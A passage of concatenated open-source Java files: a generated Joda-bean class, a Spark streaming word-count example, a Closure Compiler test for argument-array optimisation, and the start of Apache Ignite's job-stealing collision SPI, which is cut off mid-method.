underlyingExpiry return _underlyingExpiry; } return super.metaPropertyGet(propertyName); } @Override public BeanBuilder<? extends SimpleChooserPayoffStyle> builder() { return new DirectBeanBuilder<SimpleChooserPayoffStyle>(new SimpleChooserPayoffStyle()); } @Override public Class<? extends SimpleChooserPayoffStyle> beanType() { return SimpleChooserPayoffStyle.class; } @Override public Map<String, MetaProperty<?>> metaPropertyMap() { return _metaPropertyMap$; } //----------------------------------------------------------------------- /** * The meta-property for the {@code chooseDate} property. * @return the meta-property, not null */ public final MetaProperty<ZonedDateTime> chooseDate() { return _chooseDate; } /** * The meta-property for the {@code underlyingStrike} property. * @return the meta-property, not null */ public final MetaProperty<Double> underlyingStrike() { return _underlyingStrike; } /** * The meta-property for the {@code underlyingExpiry} property. * @return the meta-property, not null */ public final MetaProperty<Expiry> underlyingExpiry() { return _underlyingExpiry; } //----------------------------------------------------------------------- @Override protected Object propertyGet(Bean bean, String propertyName, boolean quiet) { switch (propertyName.hashCode()) { case 2023159397: // chooseDate return ((SimpleChooserPayoffStyle) bean).getChooseDate(); case 205707631: // underlyingStrike return ((SimpleChooserPayoffStyle) bean).getUnderlyingStrike(); case -191465744: // underlyingExpiry return ((SimpleChooserPayoffStyle) bean).getUnderlyingExpiry(); } return super.propertyGet(bean, propertyName, quiet); } @Override protected void propertySet(Bean bean, String propertyName, Object newValue, boolean quiet) { switch (propertyName.hashCode()) { case 2023159397: // chooseDate ((SimpleChooserPayoffStyle) bean).setChooseDate((ZonedDateTime) newValue); return; case 205707631: // underlyingStrike ((SimpleChooserPayoffStyle) bean).setUnderlyingStrike((Double) newValue); return; case -191465744: // underlyingExpiry ((SimpleChooserPayoffStyle) bean).setUnderlyingExpiry((Expiry) newValue); return; } super.propertySet(bean, propertyName, newValue, quiet); } @Override protected void validate(Bean bean) { JodaBeanUtils.notNull(((SimpleChooserPayoffStyle) bean)._chooseDate, "chooseDate"); JodaBeanUtils.notNull(((SimpleChooserPayoffStyle) bean)._underlyingExpiry, "underlyingExpiry"); super.validate(bean); } } ///CLOVER:ON //-------------------------- AUTOGENERATED END -------------------------- }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.spark.examples.streaming; import java.io.File; import java.io.IOException; import java.nio.charset.Charset; import java.util.Arrays; import java.util.Iterator; import java.util.List; import java.util.regex.Pattern; import scala.Tuple2; import com.google.common.io.Files; import org.apache.spark.SparkConf; import org.apache.spark.api.java.JavaPairRDD; import org.apache.spark.api.java.JavaSparkContext; import org.apache.spark.api.java.function.*; import org.apache.spark.broadcast.Broadcast; import org.apache.spark.streaming.Durations; import org.apache.spark.streaming.Time; import org.apache.spark.streaming.api.java.JavaDStream; import org.apache.spark.streaming.api.java.JavaPairDStream; import org.apache.spark.streaming.api.java.JavaReceiverInputDStream; import org.apache.spark.streaming.api.java.JavaStreamingContext; import org.apache.spark.util.LongAccumulator; /** * Use this singleton to get or register a Broadcast variable. */ class JavaWordBlacklist { private static volatile Broadcast<List<String>> instance = null; public static Broadcast<List<String>> getInstance(JavaSparkContext jsc) { if (instance == null) { synchronized (JavaWordBlacklist.class) { if (instance == null) { List<String> wordBlacklist = Arrays.asList("a", "b", "c"); instance = jsc.broadcast(wordBlacklist); } } } return instance; } } /** * Use this singleton to get or register an Accumulator. */ class JavaDroppedWordsCounter { private static volatile LongAccumulator instance = null; public static LongAccumulator getInstance(JavaSparkContext jsc) { if (instance == null) { synchronized (JavaDroppedWordsCounter.class) { if (instance == null) { instance = jsc.sc().longAccumulator("WordsInBlacklistCounter"); } } } return instance; } } /** * Counts words in text encoded with UTF8 received from the network every second. This example also * shows how to use lazily instantiated singleton instances for Accumulator and Broadcast so that * they can be registered on driver failures. * * Usage: JavaRecoverableNetworkWordCount <hostname> <port> <checkpoint-directory> <output-file> * <hostname> and <port> describe the TCP server that Spark Streaming would connect to receive * data. <checkpoint-directory> directory to HDFS-compatible file system which checkpoint data * <output-file> file to which the word counts will be appended * * <checkpoint-directory> and <output-file> must be absolute paths * * To run this on your local machine, you need to first run a Netcat server * * `$ nc -lk 9999` * * and run the example as * * `$ ./bin/run-example org.apache.spark.examples.streaming.JavaRecoverableNetworkWordCount \ * localhost 9999 ~/checkpoint/ ~/out` * * If the directory ~/checkpoint/ does not exist (e.g. running for the first time), it will create * a new StreamingContext (will print "Creating new context" to the console). Otherwise, if * checkpoint data exists in ~/checkpoint/, then it will create StreamingContext from * the checkpoint data. * * Refer to the online documentation for more details. */ public final class JavaRecoverableNetworkWordCount { private static final Pattern SPACE = Pattern.compile(" "); private static JavaStreamingContext createContext(String ip, int port, String checkpointDirectory, String outputPath) { // If you do not see this printed, that means the StreamingContext has been loaded // from the new checkpoint System.out.println("Creating new context"); final File outputFile = new File(outputPath); if (outputFile.exists()) { outputFile.delete(); } SparkConf sparkConf = new SparkConf().setAppName("JavaRecoverableNetworkWordCount"); // Create the context with a 1 second batch size JavaStreamingContext ssc = new JavaStreamingContext(sparkConf, Durations.seconds(1)); ssc.checkpoint(checkpointDirectory); // Create a socket stream on target ip:port and count the // words in input stream of \n delimited text (eg. generated by 'nc') JavaReceiverInputDStream<String> lines = ssc.socketTextStream(ip, port); JavaDStream<String> words = lines.flatMap(new FlatMapFunction<String, String>() { @Override public Iterator<String> call(String x) { return Arrays.asList(SPACE.split(x)).iterator(); } }); JavaPairDStream<String, Integer> wordCounts = words.mapToPair( new PairFunction<String, String, Integer>() { @Override public Tuple2<String, Integer> call(String s) { return new Tuple2<>(s, 1); } }).reduceByKey(new Function2<Integer, Integer, Integer>() { @Override public Integer call(Integer i1, Integer i2) { return i1 + i2; } }); wordCounts.foreachRDD(new VoidFunction2<JavaPairRDD<String, Integer>, Time>() { @Override public void call(JavaPairRDD<String, Integer> rdd, Time time) throws IOException { // Get or register the blacklist Broadcast final Broadcast<List<String>> blacklist = JavaWordBlacklist.getInstance(new JavaSparkContext(rdd.context())); // Get or register the droppedWordsCounter Accumulator final LongAccumulator droppedWordsCounter = JavaDroppedWordsCounter.getInstance(new JavaSparkContext(rdd.context())); // Use blacklist to drop words and use droppedWordsCounter to count them String counts = rdd.filter(new Function<Tuple2<String, Integer>, Boolean>() { @Override public Boolean call(Tuple2<String, Integer> wordCount) { if (blacklist.value().contains(wordCount._1())) { droppedWordsCounter.add(wordCount._2()); return false; } else { return true; } } }).collect().toString(); String output = "Counts at time " + time + " " + counts; System.out.println(output); System.out.println("Dropped " + droppedWordsCounter.value() + " word(s) totally"); System.out.println("Appending to " + outputFile.getAbsolutePath()); Files.append(output + "\n", outputFile, Charset.defaultCharset()); } }); return ssc; } public static void main(String[] args) throws Exception { if (args.length != 4) { System.err.println("You arguments were " + Arrays.asList(args)); System.err.println( "Usage: JavaRecoverableNetworkWordCount <hostname> <port> <checkpoint-directory>\n" + " <output-file>. <hostname> and <port> describe the TCP server that Spark\n" + " Streaming would connect to receive data. <checkpoint-directory> directory to\n" + " HDFS-compatible file system which checkpoint data <output-file> file to which\n" + " the word counts will be appended\n" + "\n" + "In local mode, <master> should be 'local[n]' with n > 1\n" + "Both <checkpoint-directory> and <output-file> must be absolute paths"); System.exit(1); } final String ip = args[0]; final int port = Integer.parseInt(args[1]); final String checkpointDirectory = args[2]; final String outputPath = args[3]; // Function to create JavaStreamingContext without any output operations // (used to detect the new context) Function0<JavaStreamingContext> createContextFunc = new Function0<JavaStreamingContext>() { @Override public JavaStreamingContext call() { return createContext(ip, port, checkpointDirectory, outputPath); } }; JavaStreamingContext ssc = JavaStreamingContext.getOrCreate(checkpointDirectory, createContextFunc); ssc.start(); ssc.awaitTermination(); } }
/* * Copyright 2009 The Closure Compiler Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.javascript.jscomp; /** * Unit tests for {@link OptimizeArgumentsArray}. * */ public final class OptimizeArgumentsArrayTest extends CompilerTestCase { public OptimizeArgumentsArrayTest() { /* * arguments is a builtin variable of the javascript language and * OptimizeArgumentsArray does not make any attempt to resolve it. However, * I am leaving "var arguments" in the externs to emulate the current * behavior we have for JS compilation where var arguments in defined in * externs/es3.js as extern. */ super("var arguments, alert" /* Externs */); } @Override protected CompilerPass getProcessor(Compiler compiler) { return new OptimizeArgumentsArray(compiler, "p"); } public void testSimple() { test( "function foo() { alert(arguments[0]); }", "function foo(p0) { alert( p0); }"); } public void testNoVarArgs() { testSame("function f(a,b,c) { alert(a + b + c) }"); test( "function f(a,b,c) { alert(arguments[0]) }", "function f(a,b,c) { alert( a) }"); } public void testMissingVarArgs() { testSame("function f() { alert(arguments[x]) }"); } public void testArgumentRefOnNamedParameter() { test("function f(a,b) { alert(arguments[0]) }", "function f(a,b) { alert(a) }"); } public void testTwoVarArgs() { test( "function foo(a) { alert(arguments[1] + arguments[2]); }", "function foo(a, p0, p1) { alert( p0 + p1); }"); } public void testTwoFourArgsTwoUsed() { test("function foo() { alert(arguments[0] + arguments[3]); }", "function foo(p0, p1, p2, p3) { alert(p0 + p3); }"); } public void testOneRequired() { test("function foo(req0, var_args) { alert(req0 + arguments[1]); }", "function foo(req0, var_args) { alert(req0 + var_args); }"); } public void testTwoRequiredSixthVarArgReferenced() { test("function foo(r0, r1, var_args) {alert(r0 + r1 + arguments[5]);}", "function foo(r0, r1, var_args, p0, p1, p2) { alert(r0 + r1 + p2); }"); } public void testTwoRequiredOneOptionalFifthVarArgReferenced() { test("function foo(r0, r1, opt_1)" + " {alert(r0 + r1 + opt_1 + arguments[4]);}", "function foo(r0, r1, opt_1, p0, p1)" + " {alert(r0 + r1 + opt_1 + p1); }"); } public void testTwoRequiredTwoOptionalSixthVarArgReferenced() { test("function foo(r0, r1, opt_1, opt_2)" + " {alert(r0 + r1 + opt_1 + opt_2 + arguments[5]);}", "function foo(r0, r1, opt_1, opt_2, p0, p1)" + " {alert(r0 + r1 + opt_1 + opt_2 + p1); }"); } public void testInnerFunctions() { test("function f() { function b( ) { arguments[0] }}", "function f() { function b(p0) { p0 }}"); test("function f( ) { function b() { } arguments[0] }", "function f(p0) { function b() { } p0 }"); test("function f( ) { arguments[0]; function b( ) { arguments[0] }}", "function f(p1) { p1; function b(p0) { p0 }}"); } public void testInnerFunctionsWithNamedArgumentInInnerFunction() { test("function f() { function b(x ) { arguments[1] }}", "function f() { function b(x,p0) { p0 }}"); test("function f( ) { function b(x) { } arguments[0] }", "function f(p0) { function b(x) { } p0 }"); test("function f( ) { arguments[0]; function b(x ) { arguments[1] }}", "function f(p1) { p1; function b(x,p0) { p0 }}"); } public void testInnerFunctionsWithNamedArgumentInOutterFunction() { test("function f(x) { function b( ) { arguments[0] }}", "function f(x) { function b(p0) { p0 }}"); test("function f(x ) { function b() { } arguments[1] }", "function f(x,p0) { function b() { } p0 }"); test("function f(x ) { arguments[1]; function b( ) { arguments[0] }}", "function f(x,p1) { p1; function b(p0) { p0 }}"); } public void testInnerFunctionsWithNamedArgumentInInnerAndOutterFunction() { test("function f(x) { function b(x ) { arguments[1] }}", "function f(x) { function b(x,p0) { p0 }}"); test("function f(x ) { function b(x) { } arguments[1] }", "function f(x,p0) { function b(x) { } p0 }"); test("function f(x ) { arguments[1]; function b(x ) { arguments[1] }}", "function f(x,p1) { p1; function b(x,p0) { p0 }}"); } public void testInnerFunctionsAfterArguments() { // This caused a bug earlier due to incorrect push and pop of the arguments // access stack. test("function f( ) { arguments[0]; function b() { function c() { }} }", "function f(p0) { p0; function b() { function c() { }} }"); } public void testNoOptimizationWhenGetProp() { testSame("function f() { arguments[0]; arguments.size }"); } public void testNoOptimizationWhenIndexIsNotNumberConstant() { testSame("function f() { arguments[0]; arguments['callee'].length}"); testSame("function f() { arguments[0]; arguments.callee.length}"); testSame("function f() { arguments[0]; var x = 'callee'; arguments[x].length}"); } public void testDecimalArgumentIndex() { testSame("function f() { arguments[0.5]; }"); } public void testArrowFunctions() { // simple test( "function f() { ( ) => { alert(arguments[0]); } }", "function f(p0) { ( ) => { alert( p0); } }"); // no var args testSame("function f() { (a,b,c) => alert(a + b + c); }"); test( "function f() { (a,b,c) => alert(arguments[0]); }", "function f(p0) { (a,b,c) => alert( p0); }"); // two var args test( "function f() { (a) => alert(arguments[1] + arguments[2]); }", "function f(p0,p1,p2) { (a) => alert( p1 + p2); }"); // test with required params test( "function f() { (req0, var_args) => alert(req0 + arguments[1]); }", "function f(p0, p1) { (req0, var_args) => alert(req0 + p1); }"); } public void testArrowFunctionIsInnerFunction() { test( "function f() { ( ) => { arguments[0] } }", "function f(p0) { ( ) => { p0 } }"); // Arrow function after argument test( "function f( ) { arguments[0]; ( ) => { arguments[0] } }", "function f(p0) { p0; ( ) => { p0 } }"); } public void testArrowFunctionDeclaration() { test( "function f() { var f = ( ) => { alert(arguments[0]); } }", "function f(p0) { var f = ( ) => { alert( p0); } }"); } public void testNestedFunctions() { //Arrow inside arrow inside vanilla function test( "function f() { () => { () => { arguments[0]; } } }", "function f(p0) { () => { () => { p0; } } }"); test( "function f() { () => { alert(arguments[0]); () => { arguments[0]; } } }", "function f(p0) { () => { alert( p0); () => { p0; } } }"); test( "function f() { () => { alert(arguments[0]); () => { arguments[1]; } } }", "function f(p0, p1) { () => { alert( p0); () => { p1; } } }"); } public void testNoOptimizationWhenArgumentIsUsedAsFunctionCall() { testSame("function f() {arguments[0]()}"); } public void testUnusualArgumentsUsage() { testSame("function f(x) { x[arguments]; }"); } public void testNegativeIndexNoCrash() { testSame("function badFunction() { arguments[-1]; }"); } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.ignite.spi.collision.jobstealing; import org.apache.ignite.*; import org.apache.ignite.cluster.*; import org.apache.ignite.compute.*; import org.apache.ignite.events.*; import org.apache.ignite.internal.managers.communication.*; import org.apache.ignite.internal.managers.eventstorage.*; import org.apache.ignite.internal.util.tostring.*; import org.apache.ignite.internal.util.typedef.*; import org.apache.ignite.internal.util.typedef.internal.*; import org.apache.ignite.resources.*; import org.apache.ignite.spi.*; import org.apache.ignite.spi.collision.*; import org.jdk8.backport.*; import java.io.*; import java.util.*; import java.util.Map.*; import java.util.concurrent.*; import java.util.concurrent.atomic.*; import static org.apache.ignite.events.EventType.*; /** * Collision SPI that supports job stealing from over-utilized nodes to * under-utilized nodes. This SPI is especially useful if you have * some jobs within task complete fast, and others sitting in the waiting * queue on slower nodes. In such case, the waiting jobs will be <b>stolen</b> * from slower node and moved to the fast under-utilized node. * <p> * The design and ideas for this SPI are significantly influenced by * <a href="http://gee.cs.oswego.edu/dl/papers/fj.pdf">Java Fork/Join Framework</a> * authored by Doug Lea and planned for Java 7. {@code GridJobStealingCollisionSpi} took * similar concepts and applied them to the grid (as opposed to within VM support planned * in Java 7). * <p> * Quite often grids are deployed across many computers some of which will * always be more powerful than others. This SPI helps you avoid jobs being * stuck at a slower node, as they will be stolen by a faster node. In the following picture * when Node<sub>3</sub> becomes free, it steals Job<sub>13</sub> and Job<sub>23</sub> * from Node<sub>1</sub> and Node<sub>2</sub> respectively. * <p> * <center><img src="http://http://ignite.incubator.apache.org/images/job_stealing_white.gif"></center> * <p> * <i> * Note that this SPI must always be used in conjunction with * {@link org.apache.ignite.spi.failover.jobstealing.JobStealingFailoverSpi}. * Also note that job metrics update should be enabled in order for this SPI * to work properly (i.e. {@link org.apache.ignite.configuration.IgniteConfiguration#getMetricsUpdateFrequency()} * should be set to {@code 0} or greater value). * The responsibility of Job Stealing Failover SPI is to properly route <b>stolen</b> * jobs to the nodes that initially requested (<b>stole</b>) these jobs. The * SPI maintains a counter of how many times a jobs was stolen and * hence traveled to another node. {@code GridJobStealingCollisionSpi} * checks this counter and will not allow a job to be stolen if this counter * exceeds a certain threshold {@link JobStealingCollisionSpi#setMaximumStealingAttempts(int)}. * </i> * <p> * <h1 class="header">Configuration</h1> * In order to use this SPI, you should configure your grid instance * to use {@code GridJobStealingCollisionSpi} either from Spring XML file or * directly. The following configuration parameters are supported: * <h2 class="header">Mandatory</h2> * This SPI has no mandatory configuration parameters. * <h2 class="header">Optional</h2> * The following configuration parameters are optional: * <ul> * <li> * Maximum number of active jobs that will be allowed by this SPI * to execute concurrently (see {@link #setActiveJobsThreshold(int)}). * </li> * <li> * Maximum number of waiting jobs. Once waiting queue size goes below * this number, this SPI will attempt to steal jobs from over-utilized * nodes by sending <b>"steal"</b> requests (see {@link #setWaitJobsThreshold(int)}). * </li> * <li> * Steal message expire time. If no response was received from a node * to which <b>steal</b> request was sent, then request will be considered * lost and will be resent, potentially to another node (see {@link #setMessageExpireTime(long)}). * </li> * <li> * Maximum number of stealing attempts for the job (see {@link #setMaximumStealingAttempts(int)}). * </li> * <li> * Whether stealing enabled or not (see {@link #setStealingEnabled(boolean)}). * </li> * <li> * Enables stealing to/from only nodes that have these attributes set * (see {@link #setStealingAttributes(Map)}). * </li> * </ul> * Below is example of configuring this SPI from Java code: * <pre name="code" class="java"> * GridJobStealingCollisionSpi spi = new GridJobStealingCollisionSpi(); * * // Configure number of waiting jobs * // in the queue for job stealing. * spi.setWaitJobsThreshold(10); * * // Configure message expire time (in milliseconds). * spi.setMessageExpireTime(500); * * // Configure stealing attempts number. * spi.setMaximumStealingAttempts(10); * * // Configure number of active jobs that are allowed to execute * // in parallel. This number should usually be equal to the number * // of threads in the pool (default is 100). * spi.setActiveJobsThreshold(50); * * // Enable stealing. * spi.setStealingEnabled(true); * * // Set stealing attribute to steal from/to nodes that have it. * spi.setStealingAttributes(Collections.singletonMap("node.segment", "foobar")); * * GridConfiguration cfg = new GridConfiguration(); * * // Override default Collision SPI. * cfg.setCollisionSpi(spi); * </pre> * Here is an example of how this SPI can be configured from Spring XML configuration: * <pre name="code" class="xml"> * &lt;property name="collisionSpi"&gt; * &lt;bean class="org.apache.ignite.spi.collision.jobstealing.GridJobStealingCollisionSpi"&gt; * &lt;property name="activeJobsThreshold" value="100"/&gt; * &lt;property name="waitJobsThreshold" value="0"/&gt; * &lt;property name="messageExpireTime" value="1000"/&gt; * &lt;property name="maximumStealingAttempts" value="10"/&gt; * &lt;property name="stealingEnabled" value="true"/&gt; * &lt;property name="stealingAttributes"&gt; * &lt;map&gt; * &lt;entry key="node.segment" value="foobar"/&gt; * &lt;/map&gt; * &lt;/property&gt; * &lt;/bean&gt; * &lt;/property&gt; * </pre> * <p> * <img src="http://ignite.incubator.apache.org/images/spring-small.png"> * <br> * For information about Spring framework visit <a href="http://www.springframework.org/">www.springframework.org</a> */ @SuppressWarnings("SynchronizationOnLocalVariableOrMethodParameter") @IgniteSpiMultipleInstancesSupport(true) @IgniteSpiConsistencyChecked(optional = true) public class JobStealingCollisionSpi extends IgniteSpiAdapter implements CollisionSpi, JobStealingCollisionSpiMBean { /** Maximum number of attempts to steal job by another node (default is {@code 5}). */ public static final int DFLT_MAX_STEALING_ATTEMPTS = 5; /** * Default number of parallel jobs allowed (value is {@code 95} which is * slightly less same as default value of threads in the execution thread pool * to allow some extra threads for system processing). */ public static final int DFLT_ACTIVE_JOBS_THRESHOLD = 95; /** * Default steal message expire time in milliseconds (value is {@code 1000}). * Once this time is elapsed and no response for steal message is received, * the message is considered lost and another steal message will be generated, * potentially to another node. */ public static final long DFLT_MSG_EXPIRE_TIME = 1000; /** * Default threshold of waiting jobs. If number of waiting jobs exceeds this threshold, * then waiting jobs will become available to be stolen (value is {@code 0}). */ public static final int DFLT_WAIT_JOBS_THRESHOLD = 0; /** Default start value for job priority (value is {@code 0}). */ public static final int DFLT_JOB_PRIORITY = 0; /** Communication topic. */ private static final String JOB_STEALING_COMM_TOPIC = "ignite.collision.job.stealing.topic"; /** Job context attribute for storing thief node UUID (this attribute is used in job stealing failover SPI). */ public static final String THIEF_NODE_ATTR = "ignite.collision.thief.node"; /** Threshold of maximum jobs on waiting queue. */ public static final String WAIT_JOBS_THRESHOLD_NODE_ATTR = "ignite.collision.wait.jobs.threshold"; /** Threshold of maximum jobs executing concurrently. */ public static final String ACTIVE_JOBS_THRESHOLD_NODE_ATTR = "ignite.collision.active.jobs.threshold"; /** * Name of job context attribute containing current stealing attempt count. * This count is incremented every time the same job gets stolen for * execution. * * @see org.apache.ignite.compute.ComputeJobContext */ public static final String STEALING_ATTEMPT_COUNT_ATTR = "ignite.stealing.attempt.count"; /** Maximum stealing attempts attribute name. */ public static final String MAX_STEALING_ATTEMPT_ATTR = "ignite.stealing.max.attempts"; /** Stealing request expiration time attribute name. */ public static final String MSG_EXPIRE_TIME_ATTR = "ignite.stealing.msg.expire.time"; /** Stealing priority attribute name. */ public static final String STEALING_PRIORITY_ATTR = "ignite.stealing.priority"; /** Grid logger. */ @SuppressWarnings({"FieldAccessedSynchronizedAndUnsynchronized"}) @LoggerResource private IgniteLogger log; /** Number of jobs that can be executed in parallel. */ private volatile int activeJobsThreshold = DFLT_ACTIVE_JOBS_THRESHOLD; /** Configuration parameter defining waiting job count threshold for stealing to start. */ @SuppressWarnings("RedundantFieldInitialization") private volatile int waitJobsThreshold = DFLT_WAIT_JOBS_THRESHOLD; /** Message expire time configuration parameter. */ private volatile long msgExpireTime = DFLT_MSG_EXPIRE_TIME; /** Maximum number of attempts to steal job by another node. */ private volatile int maxStealingAttempts = DFLT_MAX_STEALING_ATTEMPTS; /** Flag indicating whether job stealing is enabled. */ private volatile boolean isStealingEnabled = true; /** Steal attributes. */ @GridToStringInclude private Map<String, ? extends Serializable> stealAttrs; /** Number of jobs that were active last time. */ private volatile int runningNum; /** Number of jobs that were waiting for execution last time. */ private volatile int waitingNum; /** Number of currently held jobs. */ private volatile int heldNum; /** Total number of stolen jobs. */ private final AtomicInteger totalStolenJobsNum = new AtomicInteger(); /** Map of sent messages. */ private final ConcurrentMap<UUID, MessageInfo> sndMsgMap = new ConcurrentHashMap8<>(); /** Map of received messages. */ private final ConcurrentMap<UUID, MessageInfo> rcvMsgMap = new ConcurrentHashMap8<>(); /** */ private final Queue<ClusterNode> nodeQueue = new ConcurrentLinkedDeque8<>(); /** */ private CollisionExternalListener extLsnr; /** Discovery listener. */ private GridLocalEventListener discoLsnr; /** Communication listener. */ private GridMessageListener msgLsnr; /** Number of steal requests. */ private final AtomicInteger stealReqs = new AtomicInteger(); /** */ private Comparator<CollisionJobContext> cmp; /** {@inheritDoc} */ @IgniteSpiConfiguration(optional = true) @Override public void setActiveJobsThreshold(int activeJobsThreshold) { A.ensure(activeJobsThreshold >= 0, "activeJobsThreshold >= 0"); this.activeJobsThreshold = activeJobsThreshold; } /** {@inheritDoc} */ @Override public int getActiveJobsThreshold() { return activeJobsThreshold; } /** {@inheritDoc} */ @IgniteSpiConfiguration(optional = true) @Override public void setWaitJobsThreshold(int waitJobsThreshold) { A.ensure(waitJobsThreshold >= 0, "waitJobsThreshold >= 0"); this.waitJobsThreshold = waitJobsThreshold; } /** {@inheritDoc} */ @Override public int getWaitJobsThreshold() { return waitJobsThreshold; } /** {@inheritDoc} */ @IgniteSpiConfiguration(optional = true) @Override public void setMessageExpireTime(long msgExpireTime) { A.ensure(msgExpireTime > 0, "messageExpireTime > 0"); this.msgExpireTime = msgExpireTime; } /** {@inheritDoc} */ @Override public long getMessageExpireTime() { return msgExpireTime; } /** {@inheritDoc} */ @IgniteSpiConfiguration(optional = true) @Override public void setStealingEnabled(boolean isStealingEnabled) { this.isStealingEnabled = isStealingEnabled; } /** {@inheritDoc} */ @Override public boolean isStealingEnabled() { return isStealingEnabled; } /** {@inheritDoc} */ @IgniteSpiConfiguration(optional = true) @Override public void setMaximumStealingAttempts(int maxStealingAttempts) { A.ensure(maxStealingAttempts > 0, "maxStealingAttempts > 0"); this.maxStealingAttempts = maxStealingAttempts; } /** {@inheritDoc} */ @Override public int getMaximumStealingAttempts() { return maxStealingAttempts; } /** * Configuration parameter to enable stealing to/from only nodes that * have these attributes set (see {@link org.apache.ignite.cluster.ClusterNode#attribute(String)} and * {@link org.apache.ignite.configuration.IgniteConfiguration#getUserAttributes()} methods). * * @param stealAttrs Node attributes to enable job stealing for. */ @IgniteSpiConfiguration(optional = true) public void setStealingAttributes(Map<String, ? extends Serializable> stealAttrs) { this.stealAttrs = stealAttrs; } /** {@inheritDoc} */ @Override public Map<String, ? extends Serializable> getStealingAttributes() { return stealAttrs; } /** {@inheritDoc} */ @Override public int getCurrentRunningJobsNumber() { return runningNum; } /** {@inheritDoc} */ @Override public int getCurrentHeldJobsNumber() { return heldNum; } /** {@inheritDoc} */ @Override public int getCurrentWaitJobsNumber() { return waitingNum; } /** {@inheritDoc} */ @Override public int getCurrentActiveJobsNumber() { return runningNum + heldNum; } /** {@inheritDoc} */ @Override public int getTotalStolenJobsNumber() { return totalStolenJobsNum.get(); } /** {@inheritDoc} */ @Override public int getCurrentJobsToStealNumber() { return stealReqs.get(); } /** {@inheritDoc} */ @Override public Map<String, Object> getNodeAttributes() throws IgniteSpiException { return F.<String, Object>asMap( createSpiAttributeName(WAIT_JOBS_THRESHOLD_NODE_ATTR), waitJobsThreshold, createSpiAttributeName(ACTIVE_JOBS_THRESHOLD_NODE_ATTR), activeJobsThreshold, createSpiAttributeName(MAX_STEALING_ATTEMPT_ATTR), maxStealingAttempts, createSpiAttributeName(MSG_EXPIRE_TIME_ATTR), msgExpireTime); } /** {@inheritDoc} */ @Override public void spiStart(String gridName) throws IgniteSpiException { assertParameter(activeJobsThreshold >= 0, "activeJobsThreshold >= 0"); assertParameter(waitJobsThreshold >= 0, "waitJobsThreshold >= 0"); assertParameter(msgExpireTime > 0, "messageExpireTime > 0"); assertParameter(maxStealingAttempts > 0, "maxStealingAttempts > 0"); // Start SPI start stopwatch. startStopwatch(); // Ack parameters. if (log.isDebugEnabled()) { log.debug(configInfo("activeJobsThreshold", activeJobsThreshold)); log.debug(configInfo("waitJobsThreshold", waitJobsThreshold)); log.debug(configInfo("messageExpireTime", msgExpireTime)); log.debug(configInfo("maxStealingAttempts", maxStealingAttempts)); } registerMBean(gridName, this, JobStealingCollisionSpiMBean.class); // Ack start. if (log.isDebugEnabled()) log.debug(startInfo()); } /** {@inheritDoc} */ @Override public void spiStop() throws IgniteSpiException { unregisterMBean(); // Ack ok stop. if (log.isDebugEnabled()) log.debug(stopInfo()); } /** {@inheritDoc} */ @Override public void setExternalCollisionListener(CollisionExternalListener extLsnr) { this.extLsnr = extLsnr; } /** {@inheritDoc} */ @Override protected void onContextInitialized0(IgniteSpiContext spiCtx) throws IgniteSpiException { spiCtx.addLocalEventListener( discoLsnr = new GridLocalEventListener() { @SuppressWarnings("fallthrough") @Override public void onEvent(Event evt) { assert evt instanceof DiscoveryEvent; DiscoveryEvent discoEvt = (DiscoveryEvent)evt; UUID evtNodeId = discoEvt.eventNode().id(); switch (discoEvt.type()) { case EVT_NODE_JOINED: ClusterNode node = getSpiContext().node(evtNodeId); if (node != null) { nodeQueue.offer(node); sndMsgMap.putIfAbsent(node.id(), new MessageInfo()); rcvMsgMap.putIfAbsent(node.id(), new MessageInfo()); } break; case EVT_NODE_LEFT: case EVT_NODE_FAILED: Iterator<ClusterNode> iter = nodeQueue.iterator(); while (iter.hasNext()) { ClusterNode nextNode = iter.next(); if (nextNode.id().equals(evtNodeId)) iter.remove(); } sndMsgMap.remove(evtNodeId); rcvMsgMap.remove(evtNodeId); break; default: assert false : "Unexpected event: " + evt; } } }, EVT_NODE_FAILED, EVT_NODE_JOINED, EVT_NODE_LEFT ); Collection<ClusterNode> rmtNodes = spiCtx.remoteNodes(); for (ClusterNode node : rmtNodes) { UUID id = node.id(); if (spiCtx.node(id) != null) { sndMsgMap.putIfAbsent(id, new MessageInfo()); rcvMsgMap.putIfAbsent(id, new MessageInfo()); // Check if node has concurrently left. if (spiCtx.node(id) == null) { sndMsgMap.remove(id); rcvMsgMap.remove(id); } } } nodeQueue.addAll(rmtNodes); Iterator<ClusterNode> iter = nodeQueue.iterator(); while (iter.hasNext()) { ClusterNode nextNode = iter.next(); if (spiCtx.node(nextNode.id()) == null) iter.remove(); } spiCtx.addMessageListener( msgLsnr = new GridMessageListener() { @Override public void onMessage(UUID nodeId, Object msg) { MessageInfo info = rcvMsgMap.get(nodeId); if (info == null) { if (log.isDebugEnabled()) log.debug("Ignoring message steal request as discovery event has not yet been received " + "for node: " + nodeId); return; } int stealReqs0; synchronized (info) { JobStealingRequest req = (JobStealingRequest)msg; // Increment total number of steal requests. // Note that it is critical to increment total // number of steal requests before resetting message info. stealReqs0 = stealReqs.addAndGet(req.delta() - info.jobsToSteal()); info.reset(req.delta()); } if (log.isDebugEnabled()) log.debug("Received steal request [nodeId=" + nodeId + ", msg=" + msg + ", stealReqs=" + stealReqs0 + ']'); CollisionExternalListener tmp = 